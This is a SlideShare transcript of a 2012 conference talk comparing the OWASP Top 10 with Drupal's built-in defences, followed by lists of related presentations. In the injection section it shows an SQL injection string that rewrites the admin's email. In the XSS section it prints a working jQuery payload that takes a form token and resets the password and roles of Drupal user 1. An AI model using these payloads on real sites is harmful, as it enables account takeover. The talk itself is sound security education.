SlideShare uma empresa Scribd logo

OWASP Top 10 vs Drupal Security Review

Z
ZIONSECURITY

The document discusses securing Drupal against the OWASP Top 10 vulnerabilities. It provides examples of how vulnerabilities like SQL injection, XSS, session hijacking, insecure direct object references, CSRF, misconfiguration issues and failure to restrict URL access could occur in Drupal. It also explains the security measures Drupal has implemented, such as input filtering, form tokens, access control and encryption to address these risks.

Tecnologia
1 de 66
OWASP Top 10 vs Drupal OWASP Benelux Conference 2012 Erwin Geirnaert: CEO & Application Security Expert
Agenda • About me • Drupal Core Security • OWASP Top 10 vs Drupal
About me
Securing Drupal Drupal Core Security
Automated code review • Checkmarx is a recognized vendor of Source Code Analysis (SCA) • Automated code review of Drupal 6 and Drupal 7 • Only issues identified in the Drupal back- end • Admin access = root access
Drupal 6
Drupal 6 Most vulnerable pages
Threat path
Drupal 7
Drupal 7 Most vulnerable pages
Did you see this?
Arbitrary PHP code execution • A bug in the installer code was identified that allows an attacker to re-install Drupal using an external database server under certain transient conditions. This could allow the attacker to execute arbitrary PHP code on the original server. • This vulnerability is mitigated by the fact that the re-installation can only be successful if the site's settings.php file or sites directories are writeable by or owned by the webserver user. Configuring the Drupal installation to be owned by a different user than the webserver user (and not to be writeable by the webserver user) is a recommended security best practice. However, in all cases the transient conditions expose information to an attacker who accesses install.php, and therefore this security update should be applied to all Drupal 7 sites. Business logic flaw!!!
Did you see this?
Securing Drupal OWASP Top 10 vs Drupal
OWASP Top Ten (2010 Edition) http://www.owasp.org/index.php/Top_10
A1 – Injection Injection means… • Tricking an application into including unintended commands in the data sent to an interpreter Interpreters… • Take strings and interpret them as commands • SQL, OS Shell, LDAP, XPath, Hibernate, etc… SQL injection is still quite common • Many applications still susceptible (really don‟t know why) • Even though it‟s usually very simple to avoid Typical Impact • Usually severe. Entire database can usually be read or modified • May also allow full database schema, or account access, or even OS level access
A1-Injection • Where is the bug?
A1-Injection • How not to do it db_query("SELECT * FROM {users} WHERE uid = $uid"); • How can this be exploited? $uid = $_GET[„id‟]; //they don‟t pass an integer as expected  hacker requests: drupal.org?id=1;Update {users} SET mail=„malicious@hacker.com‟ WHERE uid = 1; db_query("SELECT * FROM {users} WHERE uid = $uid"); becomes SELECT * FROM {users} WHERE uid = 1;Update {users} SET mail=„malicious@hacker.com‟ WHERE uid = 1;
A1-Injection • Prevent injection using Drupal API properly db_query("SELECT * FROM {users} WHERE uid = %d", $uid); • The db_query method does sanitizing for you.
A2 – Cross-Site Scripting (XSS) Occurs any time… • Raw data from attacker is sent to an innocent user‟s browser Raw data… • Stored in database • Reflected from web input (form field, hidden field, URL, etc…) • Sent directly into rich JavaScript client Virtually every web application has this problem • Try this in your browser – javascript:alert(document.cookie) Typical Impact • Steal user‟s session, steal sensitive data, rewrite web page, redirect user to phishing or malware site • Most Severe: Install XSS proxy which allows attacker to observe and direct all user‟s behavior on vulnerable site and force user to other sites
A2-Cross Site Scripting (XSS) • Where is the bug?
A2-Cross Site Scripting (XSS) • How does it happen? print $_GET[„error‟]; • At first sight it looks harmless, right? • WRONG!!! • An actual example of XSS to change users‟ password & change roles.
A2-Cross Site Scripting (XSS) • <script> // Test for the presence of jquery. if (typeof jQuery == 'function') { // Fetch a correct token from user/1/edit because we will need it to // successfully submit the user edit form later. // TODO: Include a check to increase the chance that the current user is admin, // which will reduce the number of access denied error messages in the log. jQuery.get(Drupal.settings.basePath + 'user/1/edit', function (data, status) { if (status == 'success') { // Extract the token and other required data var matches = data.match(/name="name" value="([a-zA-Z0-9])"/); var name = matches[1]; var mail = 'greg.knaddison+evilguy@acquia.com'; var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-])"/); var token = matches[1]; var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/); var build_id = matches[1]; // Post the minimum amount of fields. Other fields get their default values. var payload = { "name": name, "mail": mail, "form_id": 'user_profile_form', http://crackingdrupal.com/blog/gre "form_token": token, build_id : build_id, "pass[pass1]": 'hacked', ggles/update-uid1-password- "pass[pass2]": 'hacked', "roles[3]": 3 javascript-ported-drupal-6x }; jQuery.post(Drupal.settings.basePath + 'user/1/edit', payload); } } ); } </script>
A2-Cross Site Scripting (XSS) • If code like before gets executed by a privileged user: GAME OVER
A2-Cross Site Scripting (XSS) • How to prevent it? Drupal offers a range of tools: • Filter_xss()  Filters HTML to prevent cross-site-scripting (XSS) vulnerabilities. • Check_Plain() Encodes special characters in a plain-text string for display as HTML. • Check_url()  Strips dangerous protocols from a URI and encodes it for output to HTML.
A2-Cross Site Scripting (XSS) • It is more important to think of a proper way of handling data & error messages, rather than mending wounds later. • E.g: Proper error handling drupal_set_message(„An error occured‟, „error‟);
A3 – Broken Authentication and Session Management HTTP is a “stateless” protocol • Means credentials have to go with every request • Should use SSL for everything requiring authentication Session management flaws • SESSION ID used to track state since HTTP doesn‟t • and it is just as good as credentials to an attacker • SESSION ID is typically exposed on the network, in browser, in logs, … Beware the side-doors • Change my password, remember my password, forgot my password, secret question, logout, email address, etc… Typical Impact • User accounts compromised or user sessions hijacked
A3-Broken Authentication and Session Management
A3-Broken Authentication and Session Management • In Drupal user accounts and authentication are managed by Drupal core. • Authentication cookies and a user's name, ID, and password are managed on the server to prevent a user from easily escalating their authorization. • Passwords are NEVER emailed.
A3-Broken Authentication and Session Management • User passwords, in Drupal 7, are salted and hashed using an algorithm based on the Portable PHP Password • Hashing Framework and sessions are destroyed upon login and logout.
A4 – Insecure Direct Object References How do you protect access to your data? • This is part of enforcing proper “Authorization”, along with A7 – Failure to Restrict URL Access A common mistake … • Only listing the „authorized‟ objects for the current user, or • Hiding the object references in hidden fields • … and then not enforcing these restrictions on the server side • This is called presentation layer access control, and doesn‟t work • Attacker simply tampers with parameter value Typical Impact • Users are able to access unauthorized files or data
A4-Insecure Direct Object References A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
A4-Insecure Direct Object References • Drupal provides, in most cases, a direct reference (node/[id], user/[id], ..) to its entities. • At the moment there is no core solution to prevent direct referencing. There are community contributed modules to obfuscate.
A4-Insecure Direct Object References What is the risk? • If you have private pages that aren‟t referenced on your website but aren‟t properly protected, they can still be found simply by crawling node/1, node/2, node/3. etc..
A4-Insecure Direct Object References To deal with this: • Ensure proper permissions are configured at all times for content types & pages specifically • Protection against semantic forgery attacks is implemented in Drupal core via the Form API
A5 – Cross Site Request Forgery (CSRF) Cross Site Request Forgery • An attack where the victim‟s browser is tricked into issuing a command to a vulnerable web application • Vulnerability is caused by browsers automatically including user authentication data (session ID, IP address, Windows domain credentials, …) with each request Imagine… • What if a hacker could steer your mouse and get you to click on links in your online banking application? • What could they make you do? Typical Impact • Initiate transactions (transfer funds, logout user, close account) • Access sensitive data • Change account details
A5-Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim‟s browser to send a forged HTTP request, including the victim‟s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim‟s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
A5-Cross Site Request Forgery (CSRF) • Drupal validates user intention in actions using industry standard techniques. Typical actions with side-effects (e.g. delete database objects) are generally conducted with the HTTP POST method. With AJAX you can easily create HTTP POST XmlHTTPRequests Combine this with XSS 
A5-Cross Site Request Forgery (CSRF) You can add security tokens to links When you access the path you can check the token validity
A5-Cross Site Request Forgery (CSRF) • Drupal's Form API implements unique form tokens to protect against CSRF in POST requests. • Less important actions can leverage the one-time token generation and validation functions of the Form API while still using an HTTP GET request.
A6 – Security Misconfiguration Web applications rely on a secure foundation • Everywhere from the OS up through the App Server • Don‟t forget all the libraries you are using!! Is your source code a secret? • Think of all the places your source code goes • Security should not require secret source code CM must extend to all parts of the application • All credentials should change in production Typical Impact • Install backdoor through missing OS or server patch • XSS flaw exploits due to missing application framework patches • Unauthorized access to default accounts, application functionality or data, or unused but accessible functionality due to poor server configuration
A6-Security Misconfiguration • Avoid using FTP at all cost (Total Commander is the enemy) • Keep your OS, PHP, SQL server, etc. up to date • Avoid any kind of PHP input, write your own modules instead • SSH access from everywhere? • /user/admin accessible from everywhere?
A6-Security Misconfiguration • Drupal guides you fairly well through the configuration of your website when you‟re installing it. • The status report page keeps you up to date on out of date modules or settings that aren‟t correct.
A6-Security Misconfiguration • Drupal keeps a list of best practices online that will help you configure your website with optimal security. http://drupal.org/security/secure-configuration
A7 – Insecure Cryptographic Storage Storing sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data gets stored • Databases, files, directories, log files, backups, etc. • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident, such as forensics, sending apology letters, reissuing thousands of credit cards, providing identity theft insurance • Business gets sued and/or fined
A7-Insecure Cryptographic Storage • Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.
A7-Insecure Cryptographic Storage • Drupal is modeled on the Portable PHP Password Framework • Drupal provides a randomly generated private key for every installation. Modules can use this key to use reversible encryption for sensitive data like credit- card numbers.
A8 – Failure to Restrict URL Access How do you protect access to URLs (pages)? • This is part of enforcing proper “authorization”, along with A4 – Insecure Direct Object References A common mistake … • Displaying only authorized links and menu choices • This is called presentation layer access control, and doesn‟t work • Attacker simply forges direct access to „unauthorized‟ pages Typical Impact • Attackers invoke functions and services they‟re not authorized for • Access other user‟s accounts and data • Perform privileged actions
A8-Failure to Restrict URL Access • Drupal is a powerful permission-based system which checks permissions for every URL request, even if the URL path is set to allow everyone access.
A8-Failure to Restrict URL Access Custom module example /** * Implements hook_permission(). */ function mymodule_permission() { return array( „mymodule_custom_permission' => array( 'title' => t('My module custom permission'), 'description' => t(„A custom permission setting for my module.'), ), ); } /** * Implements hook_menu(). */ function mymodule_menu() { return array( „custom/path/to/mymodule' => array( 'title' => „My module path„, 'page callback' => „mymodule_custom_permission ', 'access arguments' => array('access content'), 'type' => MENU_CALLBACK, ), ); }
A8-Failure to Restrict URL Access • In previous example a custom permission was made and a path was defined using this permission for access check. • This setting will create a permission setting which you can assign to every role separatly.
A9 – Insufficient Transport Layer Protection Transmitting sensitive data insecurely • Failure to identify all sensitive data • Failure to identify all the places that this sensitive data is sent • On the web, to backend databases, to business partners, internal communications • Failure to properly protect this data in every location Typical Impact • Attackers access or modify confidential or private information • e.g, credit cards, health care records, financial data (yours or your customers) • Attackers extract secrets to use in additional attacks • Company embarrassment, customer dissatisfaction, and loss of trust • Expense of cleaning up the incident • Business gets sued and/or fined
A9-Insufficient Transport Layer Protection • Drupal supports the use of SSL when accepting connections and rendering internal links. Drupal provides several options including: – full SSL – no-SSL – mixed-mode SSL
A10 – Unvalidated Redirects and Forwards Web application redirects are very common • And frequently include user supplied parameters in the destination URL • If they aren‟t validated, attacker can send victim to a site of their choice Forwards (aka Transfer in .NET) are common too • They internally send the request to a new page in the same application • Sometimes parameters define the target page • If not validated, attacker may be able to use unvalidated forward to bypass authentication or authorization checks Typical Impact • Redirect victim to phishing or malware site • Attacker‟s request is forwarded past security checks, allowing unauthorized function or data access
A10-Unvalidated Redirects and Forwards
A10-Unvalidated Redirects and Forwards • Internal page redirects cannot be modified to circumvent Drupal's core menu and access control system. This includes form redirects as well as flat url redirects
So is Drupal secure? • Core has no typical issues • Built-in validators and filters • Be carefull with custom code! • Be carefull with external modules! • Watch out for business logic flaws!
Drupal 8 is coming • Totally different approach • More object-oriented • Symphony framework
Questions? erwin.geirnaert@zionsecurity.com @ZIONSECURITY www.zionsecurity.com blog.zionsecurity.com

Recomendados

HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hackingBlueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 

Recomendados

HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hackingBlueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013Edouard de Lansalut
 
Owasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionOwasp Top 10 A1: Injection
Owasp Top 10 A1: InjectionMichael Hendrickx
 
Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesCarol McDonald
 
Drupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentDrupal campleuven: Secure Drupal Development
Drupal campleuven: Secure Drupal DevelopmentSteven Van den Hout
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksMohamed Talaat
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20Tabăra de Testare
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
4 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 1014 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101Ievgenii Katsan
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache ShiroClaire Hunsaker
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIsClaire Hunsaker
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 
Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 

Mais conteúdo relacionado

Mais procurados

Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10bilcorry
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingJim Manico
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaJim Manico
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Jim Manico
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshoptestuser1223
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Michael Hendrickx
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksMohamed Talaat
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)Soham Kansodaria
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...Jakub Kałużny
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Jim Manico
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20Tabăra de Testare
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache ShiroMarakana Inc.
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
4 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 1014 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101Ievgenii Katsan
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0robwinch
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks Ahmed Sherif
 

Mais procurados (20)

Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
2013 OWASP Top 10
2013 OWASP Top 102013 OWASP Top 10
2013 OWASP Top 10
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
 
RSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP TrainingRSA Europe 2013 OWASP Training
RSA Europe 2013 OWASP Training
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
DVWA BruCON Workshop
DVWA BruCON WorkshopDVWA BruCON Workshop
DVWA BruCON Workshop
 
Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)Owasp Top 10 A3: Cross Site Scripting (XSS)
Owasp Top 10 A3: Cross Site Scripting (XSS)
 
OWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacksOWASP Top 10 - Day 1 - A1 injection attacks
OWASP Top 10 - Day 1 - A1 injection attacks
 
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
 
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
In The Middle of Printers - The (In)Security of Pull Printing solutions - Hac...
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
The OWASP Top 10 Most Critical Web App Security Risks - TdT@Cluj #20
 
Super simple application security with Apache Shiro
Super simple application security with Apache ShiroSuper simple application security with Apache Shiro
Super simple application security with Apache Shiro
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
 
4 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 1014 andrii kudiurov - web application security 101
4 andrii kudiurov - web application security 101
 
From 0 to Spring Security 4.0
From 0 to Spring Security 4.0From 0 to Spring Security 4.0
From 0 to Spring Security 4.0
 
Intro to Apache Shiro
Intro to Apache ShiroIntro to Apache Shiro
Intro to Apache Shiro
 
Securing REST APIs
Securing REST APIsSecuring REST APIs
Securing REST APIs
 
Common Web Application Attacks
Common Web Application Attacks Common Web Application Attacks
Common Web Application Attacks
 

Semelhante a OWASP Top 10 vs Drupal Security Review

Drupal security
Drupal securityDrupal security
Drupal securityTechday7
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaGábor Hojtsy
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFBrian Huff
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyVlad Savitsky
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupChris Hales
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013tmd800
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Drupal security
Drupal securityDrupal security
Drupal securityJozef Toth
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesAlireza Aghamohammadi
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top TenSecurity Innovation
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security rightGábor Hojtsy
 

Semelhante a OWASP Top 10 vs Drupal Security Review (20)

Drupal security
Drupal securityDrupal security
Drupal security
 
Drupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp BratislavaDrupal Security from Drupalcamp Bratislava
Drupal Security from Drupalcamp Bratislava
 
Is Drupal Secure?
Is Drupal Secure?Is Drupal Secure?
Is Drupal Secure?
 
Is Drupal secure?
Is Drupal secure?Is Drupal secure?
Is Drupal secure?
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security Hardening
 
Drupal Security Hardening
Drupal Security HardeningDrupal Security Hardening
Drupal Security Hardening
 
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADFOWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF
 
Looking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad SavitskyLooking for Vulnerable Code. Vlad Savitsky
Looking for Vulnerable Code. Vlad Savitsky
 
Drupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January MeetupDrupal Security Basics for the DrupalJax January Meetup
Drupal Security Basics for the DrupalJax January Meetup
 
OWASP top 10-2013
OWASP top 10-2013OWASP top 10-2013
OWASP top 10-2013
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Rails Security
Rails SecurityRails Security
Rails Security
 
Drupal security
Drupal securityDrupal security
Drupal security
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
null Bangalore meet - Php Security
null Bangalore meet - Php Securitynull Bangalore meet - Php Security
null Bangalore meet - Php Security
 
Identifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilitiesIdentifying & fixing the most common software vulnerabilities
Identifying & fixing the most common software vulnerabilities
 
How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Doing Drupal security right
Doing Drupal security rightDoing Drupal security right
Doing Drupal security right
 

Último

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
